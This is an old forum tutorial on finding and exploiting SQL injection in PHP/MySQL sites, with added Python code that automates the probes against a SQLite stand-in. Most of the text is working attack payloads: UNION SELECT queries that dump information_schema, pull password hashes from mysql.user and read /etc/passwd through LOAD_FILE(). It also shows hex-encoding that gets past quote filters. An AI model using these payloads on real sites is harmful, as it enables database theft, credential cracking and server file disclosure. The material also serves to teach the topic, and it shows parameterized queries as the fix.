SQL Injections Revealed - Submitted By: Link- 2008-09-23 16:01:02
--------------------
| SQL Injection |
--------------------

Description
Server type: LAMP

●   Linux

●   Apache

●   MySQL

●   PHP



In this short article I will go through the basic steps of finding an SQL injection and then using it to read out the database.

Nevertheless, this article on its own is never enough. You have to dig deeper, experiment and work hard to acquire the knowledge needed to find vulnerabilities and carry a full attack through.



Let’s start…



Let’s suppose we have the following URL:

http://fakeurl.com/index.php?id=1016



This is a page that displays articles pulled from a database. Please note that not every URL of this form is backed by a database: some scripts just read the text from a local .txt file or simply include another file, and those will not react to the tests below.



Anyway, let’s test whether the value of id reaches the query unsanitised:

http://fakeurl.com/index.php?id=1016 and 1=1--

This should return the normal article, because the condition we appended is always true. Now make it always false:

http://fakeurl.com/index.php?id=1016 and 1=0--

If the first URL shows the article and the second one gives a blank page, a different page or a database error, then the id value is being pasted straight into the SQL statement and you have an injection. A quick way to provoke an informative error is to append a single quote (id=1016') and see whether the page complains about SQL syntax; if it does, the parameter is used inside a quoted string rather than as a bare number, and the payloads below need a leading quote to close it. One MySQL caveat: the -- comment is only recognised when a space follows it, so in a URL write --+ (the + becomes a space) or use # (URL-encoded as %23); otherwise the rest of the query is not commented out.



If the test succeeds, proceed by counting the columns the query returns:

http://fakeurl.com/index.php?id=1016 ORDER BY 1--

Increment the number until you get a blank page or an error. MySQL rejects ORDER BY n when n is larger than the number of columns in the SELECT, so if ORDER BY 6 still works and ORDER BY 7 breaks the page, the query returns 6 columns, and that is the number of columns our own SELECT has to supply in the next step, the UNION. Why do we use UNION?



Let’s explain a little what ?id=1016 means.

When an HTTP request arrives, whether by GET or POST, the PHP code reads the value after the = sign into a variable and builds a query around it, so

?id=1016 is turned into a query like: SELECT article_title, article_body FROM articles WHERE id=1016;

(The table and column names are placeholders; the real query on this page returns six columns, of which only two are shown here.)

Now everything we append after 1016 becomes part of that same query:

http://fakeurl.com/index.php?id=1016 ORDER BY 1--    ::    SELECT article_title, article_body FROM articles WHERE id=1016 ORDER BY 1--;

The -- turns whatever the application would have appended after our input (a closing quote, a LIMIT, further conditions) into a comment, so our part of the query ends where we want it to.

Now the union part:

SELECT ... SELECT   IS NOT VALID! Two SELECT statements cannot simply follow one another inside a single query.

Thus we use SELECT ... UNION SELECT: it combines the result sets of two SELECT statements, provided both return the same number of columns, and the page displays the combined rows.

Ok, now that we understand what happens inside, let’s move on! The next step is to use our own SELECT to pull out information. Replace 1016 with null so that the first SELECT matches no row (it still runs, but id=null is never true) and only the row from our UNIONed SELECT reaches the page:



http://fakeurl.com/index.php?id=null UNION ALL SELECT 1,2,3,4,5,6--



This should display something like the following (the exact layout depends on the page template):

1

           3               5

6

This means the template prints columns 1, 3, 5 and 6 of the result. We can replace those four placeholders with functions or column names and their values will appear on the page; positions 2 and 4 are fetched but never rendered, so leave the placeholder numbers in them.
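The probing steps above (the and 1=1 / and 1=0 test, counting columns with ORDER BY, finding the rendered columns with UNION ALL SELECT 1,2,...) as a runnable added example; this is not code from the original article. It uses Python with an in-memory SQLite database as a stand-in for the LAMP target: the articles table, its six columns, the sample rows and the template that prints only some columns are all assumptions constructed for this example, and sqlite_master plays the role that information_schema plays in MySQL. Note that SQLite, unlike MySQL, does not need a space after --. The hardened safe_page() shows the fix, a bound parameter, against which the same probes fail.

```python
import sqlite3

# Constructed stand-in for the page's fakeurl.com database. The table, its six
# columns (matching the article's ORDER BY count), the rows and the template that
# prints only some of the columns are all assumptions made for this example.
SCHEMA = """
CREATE TABLE articles (
    id INTEGER PRIMARY KEY, article_title TEXT, article_body TEXT,
    author TEXT, created TEXT, views INTEGER);
INSERT INTO articles VALUES (1016, 'Hello', 'First article body', 'link', '2008-09-23', 42);
INSERT INTO articles VALUES (1017, 'Second', 'Another body', 'staff', '2008-09-24', 7);
"""

def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def vulnerable_page(db, id_param):
    """index.php as the article describes it: the raw ?id= value is glued into
    the SQL. Returns the rows, or None when the query errors (the 'blank page').
    The trailing LIMIT is what an injected '--' comments out."""
    try:
        sql = "SELECT * FROM articles WHERE id=" + id_param + " LIMIT 1"
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        return None

def safe_page(db, id_param):
    """Hardened form: the value is bound as a parameter and never parsed as SQL."""
    try:
        sql = "SELECT * FROM articles WHERE id=? LIMIT 1"
        return db.execute(sql, (id_param,)).fetchall()
    except sqlite3.Error:
        return None

def render(row):
    """The page template prints only title, body and author (positions 2, 3, 4)."""
    return (row[1], row[2], row[3])

def is_injectable(page, db, article_id):
    """Boolean test: 'and 1=1' must look like the untouched page and
    'and 1=0' must come back blank. (MySQL would need a space after '--'.)"""
    baseline = page(db, str(article_id))
    same = page(db, f"{article_id} and 1=1--")
    blank = page(db, f"{article_id} and 1=0--")
    return bool(baseline) and same == baseline and not blank

def count_columns(page, db, article_id, limit=32):
    """Raise ORDER BY n until the page breaks; the last n that worked is the column count."""
    for n in range(1, limit + 1):
        if page(db, f"{article_id} ORDER BY {n}--") is None:
            return n - 1
    return None

def union_row(ncols, replacements):
    """Marker row 1..ncols with the chosen slots replaced by SQL expressions."""
    return ",".join(replacements.get(i, str(i)) for i in range(1, ncols + 1))

def visible_positions(page, db, ncols):
    """id=null empties the first SELECT, so only our marker row survives the UNION;
    the markers the template prints are the slots through which data can be read."""
    rows = page(db, f"null UNION ALL SELECT {union_row(ncols, {})}--")
    if not rows:
        return []
    shown = set(render(rows[0]))
    return [i for i in range(1, ncols + 1) if i in shown]

def db_version(page, db, ncols, slot):
    """Counterpart of the article's version() probe (sqlite_version() here)."""
    rows = page(db, f"null UNION ALL SELECT {union_row(ncols, {slot: 'sqlite_version()'})}--")
    return rows[0][slot - 1] if rows else None

def dump_schema(page, db, ncols, name_slot, sql_slot):
    """Read table definitions through two visible slots. sqlite_master stands in
    for MySQL's information_schema.COLUMNS, which SQLite does not have."""
    cols = union_row(ncols, {name_slot: "name", sql_slot: "sql"})
    rows = page(db, f"null UNION ALL SELECT {cols} FROM sqlite_master--")
    return [(r[name_slot - 1], r[sql_slot - 1]) for r in rows or []]

if __name__ == "__main__":
    db = make_db()
    for label, page in (("vulnerable", vulnerable_page), ("safe", safe_page)):
        print(f"{label}: injectable = {is_injectable(page, db, 1016)}")
    n = count_columns(vulnerable_page, db, 1016)
    slots = visible_positions(vulnerable_page, db, n)
    print(f"{n} columns, rendered slots {slots}, version {db_version(vulnerable_page, db, n, slots[0])}")
    for name, ddl in dump_schema(vulnerable_page, db, n, slots[0], slots[1]):
        print(name, ddl)
```

Against the vulnerable page the probes report six columns and slots 2, 3 and 4 as rendered; against safe_page() the and 1=1 probe already returns no row, because the whole string is compared as a value rather than executed.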



Let’s try the following:

http://fakeurl.com/index.php?id=null UNION ALL SELECT table_schema,2, table_name,4, column_name, ordinal_position from information_schema.COLUMNS--

Where:

table_schema: name of the database (schema) the table belongs to

table_name: name of the table in that database

column_name: name of the column in the table

ordinal_position: position of the column within its table, counting from 1

information_schema exists from MySQL 5.0 onward; on older servers you have to guess table and column names. The query above returns one row for every column the database account is allowed to see, so if the page only renders one row, walk through them with LIMIT 0,1, LIMIT 1,1 and so on, or narrow it down with WHERE table_schema=database().



A second statement to use is:

http://fakeurl.com/index.php?id=null UNION ALL SELECT host,2,user,4,password,6 from mysql.user--

host: host the account is allowed to connect from

user: the account’s login name

password: the stored password hash (a one-way hash, not reversible encryption, so it has to be cracked offline; on MySQL 5.7 and later the column is called authentication_string)

Reading mysql.user only works if the web application’s database account has SELECT on the mysql database, which a sensibly configured site does not grant.



A third informational statement would be:

http://fakeurl.com/index.php?id=null UNION ALL SELECT version(),2,3,4,5,6--

version(): MySQL server version. user() and database() can be dropped into the same slot to learn which account the application connects as and which database it is using.





Another statement: [1]

http://fakeurl.com/index.php?id=null UNION ALL SELECT grantee,2, table_catalog,4, privilege_type, is_grantable from information_schema.USER_PRIVILEGES--

grantee: the account the privilege row applies to

table_catalog: catalog name; in MySQL this is always 'def' (NULL on MySQL 5.1 and earlier)

privilege_type: the privilege granted to the account (SELECT, FILE, SUPER, ...)

is_grantable: whether the account may pass the privilege on to others (YES or NO)

Look for FILE in privilege_type: that is what the next step depends on.





If the database account has the FILE privilege, the LOAD_FILE() function can be used to read files from the database server’s filesystem and display them through one of the rendered UNION slots, for example LOAD_FILE('/etc/passwd'). The file has to be readable by the operating-system user mysqld runs as, and on newer servers the secure_file_priv setting restricts (or disables altogether) the directories LOAD_FILE may read from.

In order to bypass quote filtering we use an ASCII -> hexadecimal string conversion: MySQL accepts a hex literal such as 0x2f6574632f706173737764 (the bytes of /etc/passwd) anywhere it expects a string, so LOAD_FILE(0x2f6574632f706173737764) contains no quote characters at all. This effectively bypasses most quote filtering done by the application, though not a proper fix such as prepared statements, where the input is never parsed as SQL in the first place.
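The ASCII -> hex conversion utility the paragraph above refers to, together with two constructed stand-ins for application-side quote filtering, as an added example (not code from the original article). It builds the article’s information_schema and LOAD_FILE payloads in quoted and hex form and checks which of them a filter hands on unchanged. The table name and file path are sample inputs, the filters imitate quote stripping and PHP addslashes() style escaping, and --+ is the URL spelling of the space MySQL requires after --.

```python
# Added example: the ASCII -> hex conversion the article mentions and why the hex
# form survives quote filtering. strip_quotes() and addslashes() are constructed
# stand-ins for application-side filters; the table name and path are samples.

def mysql_hex_literal(text: str) -> str:
    """Encode a string as a MySQL 0x... literal, usable wherever MySQL expects
    a string (WHERE clauses, LOAD_FILE()) and free of quote characters."""
    return "0x" + text.encode("utf-8").hex()

def decode_hex_literal(literal: str) -> str:
    """Reverse the conversion, e.g. to double-check a payload before sending it."""
    if not literal.startswith("0x"):
        raise ValueError("not a hex literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")

def strip_quotes(param: str) -> str:
    """Constructed filter 1: the application deletes quote characters."""
    return param.replace("'", "").replace('"', "")

def addslashes(param: str) -> str:
    """Constructed filter 2: PHP addslashes()/magic_quotes style escaping."""
    return param.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def columns_payload(table: str, use_hex: bool) -> str:
    """The article's information_schema.COLUMNS query, narrowed to one table."""
    tbl = mysql_hex_literal(table) if use_hex else f"'{table}'"
    return ("null UNION ALL SELECT table_schema,2,table_name,4,column_name,ordinal_position"
            f" FROM information_schema.COLUMNS WHERE table_name={tbl}--+")

def load_file_payload(path: str) -> str:
    """LOAD_FILE() through the first rendered slot, with the path as a hex literal."""
    return f"null UNION ALL SELECT LOAD_FILE({mysql_hex_literal(path)}),2,3,4,5,6--+"

def survives(filter_fn, payload: str) -> bool:
    """A payload is still usable only if the filter hands it on unchanged."""
    return filter_fn(payload) == payload

if __name__ == "__main__":
    for name, f in (("strip_quotes", strip_quotes), ("addslashes", addslashes)):
        print(name, "quoted payload ok:", survives(f, columns_payload("users", False)),
              "hex payload ok:", survives(f, columns_payload("users", True)))
    print(load_file_payload("/etc/passwd"))
```

Both filters break the quoted payload and leave the hex payload untouched, which is the whole point of the conversion: the injected text contains nothing for a quote filter to act on.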



[1]: Taken from "Understanding MySQL Union Poisoning" by Jason A. Medeiros





I hope this gave you a good understanding of these injections. There is still a lot more to learn: MSSQL, PostgreSQL and Oracle each have their own syntax and system tables that you need to study. Plus, knowing PHP is very helpful, because it lets you see why a query is built the way it is.

Please do not rely on this article to rank yourself among the best; it is very basic, but still very useful. Being the best is all about knowing why things happen!



Warm Regards,

Link-
